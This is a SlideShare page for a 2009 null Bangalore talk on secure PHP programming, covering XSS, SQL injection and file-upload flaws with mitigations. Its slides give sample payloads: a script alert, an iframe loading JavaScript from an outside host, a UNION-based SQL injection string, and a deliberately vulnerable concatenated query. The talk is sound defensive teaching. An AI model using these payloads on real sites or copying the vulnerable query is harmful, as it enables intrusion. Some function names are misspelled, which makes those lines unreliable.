SlideShare ist ein Scribd-Unternehmen logo

null Bangalore meet - Php Security

n|u - The Open Security Community
n|u - The Open Security Community

null Bangalore meet - PHP Security – By Akash Mahajan http://null.co.in

Technologie
1 von 8
Downloaden Sie, um offline zu lesen
Secure Web App Programming Akash Mahajan Talk at NULL Bangalore Meeting 8th August 2009
Cross Site Scripting - XSS • Injecting HTML/JS into the site. – Non-persistent/Reflected/First Order • Script is taken from the request and displayed in the browser directly • example.com/search?q=<script>alert(‘hi’);</script> • Example.com/index.php?lang=path to php shell – Persistent/Stored/Second Order • First name of a registration form is vuln and the value is stored in the database • Hello <iframe src=http://f1y.in/0.js></iframe> – DOM Based • No example, mentioned by Amit Klien in his paper XSS of the Third Kind
XSS mitigation in PHP • Sanitize all globals ($_GET, $_POST, $_COOKIE) – Use strip_tags() – Use inpekt library code.google.com/p/inspekt • Escape everything before displaying – htmlentities(), htmlspeciachars() • Client headers like user agent can be malicious as well. • Thumb rule, if its not your data consider it bad. If you can verify it, consider it trusted good data. • White listing helps in verifying good data more than black listing. • See examples at xssed.com
SQL Injection • Allowing SQL to be injected in the database query. • Most common attack point is the search of any dynamic website and registration forms. These two will be definitely talking to the database. • $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'"; • id = ‘ OR 1 UNION ALL SELECT * FROM table; • Excellent examples http://google.com/search?q=site:slideshare.net sql injection
SQL Injection - Mitigation • mysql_real_escape_string() – $dbquery = sprintf(“SELECT name FROM user WHERE id=‘%s’”, mysql_real_escape_string(‘id’)); • Parameterized queries – $res = $query(“SELECT name FROM user WHERE id=?”, $id); – Standard mysql module in PHP doesn’t allow for parameterized queries. You need mysqli • Stored Procedures – See a kickass example of stored proc used to hack more than hundred thousand websites • http://www.breach.com/resources/breach-security- labs/alerts/mass-sql-injection-attack-evolutio
File Uploads • Web apps add a directory in document root for storing file uploads and give write access. • They don’t randomize filenames. So a specially crafted image file which has PHP code written in it gets saved there. • The malicious user is now free to call it using a GET request and it gets executed. • http://www.scanit.be/uploads/php-file- upload.pdf
File Uploads - Mitigation • The usual use case is uploading of image files. • Use getimageinfo() to get the correct mime type of the file from the file header. • Generate a random file name – $rand = time() . substr(md5(microtime()), 0, rand(5, 12)); – Return $rand and append file extension • Ideally noexec permission should be set on the directory where files are copied to.
Endgame • At this point you have reasonable ensured that your PHP web application is not compromised. • But the user connecting to your website are vulnerable to session hijacking, CSRF from your site etc. • There are work around to the standard PHP functions like this one for mysql_real_escape_strings() – http://shiflett.org/blog/2006/jan/addslashes-versus- mysql-real-escape-string

Empfohlen

Entity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsEntity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applications
Mikhail Egorov
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security right
Gábor Hojtsy
 
Unsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIUnsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST API
Mikhail Egorov
 
Securing REST APIs
Securing REST APIsSecuring REST APIs
Securing REST APIs
Claire Hunsaker
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
Steven Van den Hout
 
PHP Profiling/performance
PHP Profiling/performancePHP Profiling/performance
PHP Profiling/performance
Nicolas Degardin
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache Shiro
Claire Hunsaker
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache Shiro
Marakana Inc.
 

Empfohlen

Entity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsEntity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applications
Mikhail Egorov
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security right
Gábor Hojtsy
 
Unsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIUnsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST API
Mikhail Egorov
 
Securing REST APIs
Securing REST APIsSecuring REST APIs
Securing REST APIs
Claire Hunsaker
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
Steven Van den Hout
 
PHP Profiling/performance
PHP Profiling/performancePHP Profiling/performance
PHP Profiling/performance
Nicolas Degardin
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache Shiro
Claire Hunsaker
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache Shiro
Marakana Inc.
 
Drupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowDrupal and Security: What You Need to Know
Drupal and Security: What You Need to Know
Acquia
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 Injection
Paul Ionescu
 
4 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 1014 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 101
Ievgenii Katsan
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
Four Kitchens
 
Drupal security
Drupal securityDrupal security
Drupal security
Techday7
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
Mikhail Egorov
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
Ferruh Mavituna
 
season management in php (WT)
season management in php (WT)season management in php (WT)
season management in php (WT)
kunjan shah
 
Rest Essentials
Rest EssentialsRest Essentials
Rest Essentials
Sergey Podolsky
 
An approach to app security - For beginners
An approach to app security - For beginnersAn approach to app security - For beginners
An approach to app security - For beginners
vodQA
 
Php workshop L04 database
Php workshop L04 databasePhp workshop L04 database
Php workshop L04 database
Mohammad Tahsin Alshalabi
 
Defeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security PolicyDefeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security Policy
Francois Marier
 
Php workshop L03 superglobals
Php workshop L03 superglobalsPhp workshop L03 superglobals
Php workshop L03 superglobals
Mohammad Tahsin Alshalabi
 
Alfresco DevCon 2018: Role Based Access Control with Apache Shiro
Alfresco DevCon 2018: Role Based Access Control with Apache ShiroAlfresco DevCon 2018: Role Based Access Control with Apache Shiro
Alfresco DevCon 2018: Role Based Access Control with Apache Shiro
Ermanno Russo
 
Android stepbystep
Android stepbystepAndroid stepbystep
Android stepbystep
Krazy Koder
 
Intro to Pentesting Jenkins
Intro to Pentesting JenkinsIntro to Pentesting Jenkins
Intro to Pentesting Jenkins
Brian Hysell
 
Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default"
Duo Security
 
Introduction To Ruby Watir (Web Application Testing In Ruby)
Introduction To Ruby Watir (Web Application Testing In Ruby)Introduction To Ruby Watir (Web Application Testing In Ruby)
Introduction To Ruby Watir (Web Application Testing In Ruby)
Mindfire Solutions
 
Unleashing Creative Freedom with MODX - 2015-08-26 at PHP Zwolle
Unleashing Creative Freedom with MODX - 2015-08-26 at PHP Zwolle Unleashing Creative Freedom with MODX - 2015-08-26 at PHP Zwolle
Unleashing Creative Freedom with MODX - 2015-08-26 at PHP Zwolle
Mark Hamstra
 
Open source security
Open source securityOpen source security
Open source security
lrigknat
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
ZIONSECURITY
 

Weitere ähnliche Inhalte

Was ist angesagt?

Drupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowDrupal and Security: What You Need to Know
Drupal and Security: What You Need to Know
Acquia
 
Alfresco DevCon 2018: Role Based Access Control with Apache Shiro
Alfresco DevCon 2018: Role Based Access Control with Apache ShiroAlfresco DevCon 2018: Role Based Access Control with Apache Shiro
Alfresco DevCon 2018: Role Based Access Control with Apache Shiro
Ermanno Russo
 
Android stepbystep
Android stepbystepAndroid stepbystep
Android stepbystep
Krazy Koder
 

Was ist angesagt? (20)

Drupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowDrupal and Security: What You Need to Know
Drupal and Security: What You Need to Know
 
Owasp Top 10 - A1 Injection
Owasp Top 10 - A1 InjectionOwasp Top 10 - A1 Injection
Owasp Top 10 - A1 Injection
 
4 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 1014 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 101
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
 
Drupal security
Drupal securityDrupal security
Drupal security
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
 
season management in php (WT)
season management in php (WT)season management in php (WT)
season management in php (WT)
 
Rest Essentials
Rest EssentialsRest Essentials
Rest Essentials
 
An approach to app security - For beginners
An approach to app security - For beginnersAn approach to app security - For beginners
An approach to app security - For beginners
 
Php workshop L04 database
Php workshop L04 databasePhp workshop L04 database
Php workshop L04 database
 
Defeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security PolicyDefeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security Policy
 
Php workshop L03 superglobals
Php workshop L03 superglobalsPhp workshop L03 superglobals
Php workshop L03 superglobals
 
Alfresco DevCon 2018: Role Based Access Control with Apache Shiro
Alfresco DevCon 2018: Role Based Access Control with Apache ShiroAlfresco DevCon 2018: Role Based Access Control with Apache Shiro
Alfresco DevCon 2018: Role Based Access Control with Apache Shiro
 
Android stepbystep
Android stepbystepAndroid stepbystep
Android stepbystep
 
Intro to Pentesting Jenkins
Intro to Pentesting JenkinsIntro to Pentesting Jenkins
Intro to Pentesting Jenkins
 
Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default"
 
Introduction To Ruby Watir (Web Application Testing In Ruby)
Introduction To Ruby Watir (Web Application Testing In Ruby)Introduction To Ruby Watir (Web Application Testing In Ruby)
Introduction To Ruby Watir (Web Application Testing In Ruby)
 
Unleashing Creative Freedom with MODX - 2015-08-26 at PHP Zwolle
Unleashing Creative Freedom with MODX - 2015-08-26 at PHP Zwolle Unleashing Creative Freedom with MODX - 2015-08-26 at PHP Zwolle
Unleashing Creative Freedom with MODX - 2015-08-26 at PHP Zwolle
 

Ähnlich wie null Bangalore meet - Php Security

Open source security
Open source securityOpen source security
Open source security
lrigknat
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
Brian Huff
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa
 

Ähnlich wie null Bangalore meet - Php Security (20)

Open source security
Open source securityOpen source security
Open source security
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
Rails Security
Rails SecurityRails Security
Rails Security
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Codeigniter
CodeigniterCodeigniter
Codeigniter
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp Bratislava
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a Database
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Ruby on Rails Security Guide
Ruby on Rails Security GuideRuby on Rails Security Guide
Ruby on Rails Security Guide
 

Mehr von n|u - The Open Security Community

Mehr von n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Kürzlich hochgeladen

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 

Kürzlich hochgeladen (20)

Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 

null Bangalore meet - Php Security

  • 1. Secure Web App Programming Akash Mahajan Talk at NULL Bangalore Meeting 8th August 2009
  • 2. Cross Site Scripting - XSS • Injecting HTML/JS into the site. – Non-persistent/Reflected/First Order • Script is taken from the request and displayed in the browser directly • example.com/search?q=<script>alert(‘hi’);</script> • Example.com/index.php?lang=path to php shell – Persistent/Stored/Second Order • First name of a registration form is vuln and the value is stored in the database • Hello <iframe src=http://f1y.in/0.js></iframe> – DOM Based • No example, mentioned by Amit Klien in his paper XSS of the Third Kind
  • 3. XSS mitigation in PHP • Sanitize all globals ($_GET, $_POST, $_COOKIE) – Use strip_tags() – Use inpekt library code.google.com/p/inspekt • Escape everything before displaying – htmlentities(), htmlspeciachars() • Client headers like user agent can be malicious as well. • Thumb rule, if its not your data consider it bad. If you can verify it, consider it trusted good data. • White listing helps in verifying good data more than black listing. • See examples at xssed.com
  • 4. SQL Injection • Allowing SQL to be injected in the database query. • Most common attack point is the search of any dynamic website and registration forms. These two will be definitely talking to the database. • $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'"; • id = ‘ OR 1 UNION ALL SELECT * FROM table; • Excellent examples http://google.com/search?q=site:slideshare.net sql injection
  • 5. SQL Injection - Mitigation • mysql_real_escape_string() – $dbquery = sprintf(“SELECT name FROM user WHERE id=‘%s’”, mysql_real_escape_string(‘id’)); • Parameterized queries – $res = $query(“SELECT name FROM user WHERE id=?”, $id); – Standard mysql module in PHP doesn’t allow for parameterized queries. You need mysqli • Stored Procedures – See a kickass example of stored proc used to hack more than hundred thousand websites • http://www.breach.com/resources/breach-security- labs/alerts/mass-sql-injection-attack-evolutio
  • 6. File Uploads • Web apps add a directory in document root for storing file uploads and give write access. • They don’t randomize filenames. So a specially crafted image file which has PHP code written in it gets saved there. • The malicious user is now free to call it using a GET request and it gets executed. • http://www.scanit.be/uploads/php-file- upload.pdf
  • 7. File Uploads - Mitigation • The usual use case is uploading of image files. • Use getimageinfo() to get the correct mime type of the file from the file header. • Generate a random file name – $rand = time() . substr(md5(microtime()), 0, rand(5, 12)); – Return $rand and append file extension • Ideally noexec permission should be set on the directory where files are copied to.
  • 8. Endgame • At this point you have reasonable ensured that your PHP web application is not compromised. • But the user connecting to your website are vulnerable to session hijacking, CSRF from your site etc. • There are work around to the standard PHP functions like this one for mysql_real_escape_strings() – http://shiflett.org/blog/2006/jan/addslashes-versus- mysql-real-escape-string